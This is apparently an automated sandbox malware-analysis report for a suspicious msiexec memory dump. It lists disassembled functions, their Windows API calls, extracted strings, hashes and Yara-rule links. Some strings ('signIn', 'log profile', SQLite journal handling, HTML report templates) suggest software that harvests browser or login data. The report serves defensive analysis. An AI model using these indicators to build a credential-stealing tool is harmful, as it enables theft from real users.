                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                    • String ID: strings
                                                                                                    • API String ID: 3166385802-3030018805
                                                                                                    • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                    • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                    • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                    • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                    Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0041249C
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                    • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                    • wcscpy.MSVCRT ref: 004125A0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                    • String ID: r!A
                                                                                                    • API String ID: 2791114272-628097481
                                                                                                    • Opcode ID: a1029283d1783dcc6be2830c0b5af2bb8bc6b16ea9a96fe8d974539b3d9e2e59
                                                                                                    • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                    • Opcode Fuzzy Hash: a1029283d1783dcc6be2830c0b5af2bb8bc6b16ea9a96fe8d974539b3d9e2e59
                                                                                                    • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                    Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00411AF6
                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                    • wcsrchr.MSVCRT ref: 00411B14
                                                                                                    • wcscat.MSVCRT ref: 00411B2E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                    • String ID: AE$.cfg$General$EA
                                                                                                    • API String ID: 776488737-1622828088
                                                                                                    • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                    • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                    • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                    • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                    Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040D8BD
                                                                                                    • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                    • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                    • memset.MSVCRT ref: 0040D906
                                                                                                    • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                    • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                      • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                      • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                    • String ID: sysdatetimepick32
                                                                                                    • API String ID: 1028950076-4169760276
                                                                                                    • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                    • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                    • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                    • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                    Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                    • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                    • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                    • memset.MSVCRT ref: 0041BA3D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID: -journal$-wal
                                                                                                    • API String ID: 438689982-2894717839
                                                                                                    • Opcode ID: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                                                                                    • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                    • Opcode Fuzzy Hash: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                                                                                    • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                    Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                    • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                    • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                      • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                      • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                    • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Item$Dialog$MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3975816621-0
                                                                                                    • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                    • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                    • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                    • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                    Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                    • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                    • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                    • String ID: .save$http://$https://$log profile$signIn
                                                                                                    • API String ID: 1214746602-2708368587
                                                                                                    • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                    • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                    • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                    • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                    Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                    • memset.MSVCRT ref: 00405E33
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                    • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                    • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2313361498-0
                                                                                                    • Opcode ID: dbf080e2312ba69413c855b5325c4e68162c72551a66d7fbd90f613b3fbf667c
                                                                                                    • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                    • Opcode Fuzzy Hash: dbf080e2312ba69413c855b5325c4e68162c72551a66d7fbd90f613b3fbf667c
                                                                                                    • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                    Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                    • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                    • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                      • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                    • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                    • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ItemMessageRectSend$Client
                                                                                                    • String ID:
                                                                                                    • API String ID: 2047574939-0
                                                                                                    • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                    • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                    • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                    • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                    Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                    • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                    • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 4218492932-0
                                                                                                    • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                    • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                    • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                    • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                    Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                    • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                    • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                    • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID: gj
                                                                                                    • API String ID: 438689982-4203073231
                                                                                                    • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                    • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                    • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                    • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                    Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                    • API String ID: 3510742995-2446657581
                                                                                                    • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                    • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                    • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                    • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                    Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                    • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                    • memset.MSVCRT ref: 00405ABB
                                                                                                    • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                    • SetFocus.USER32(?), ref: 00405B76
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$FocusItemmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 4281309102-0
                                                                                                    • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                    • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                    • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                    • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                    Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _snwprintfwcscat
                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                    • API String ID: 384018552-4153097237
                                                                                                    • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                    • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                    • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                    • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                    Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                    • String ID: 0$6
                                                                                                    • API String ID: 2029023288-3849865405
                                                                                                    • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                    • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                    • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                    • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                    Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                    • memset.MSVCRT ref: 00405455
                                                                                                    • memset.MSVCRT ref: 0040546C
                                                                                                    • memset.MSVCRT ref: 00405483
                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
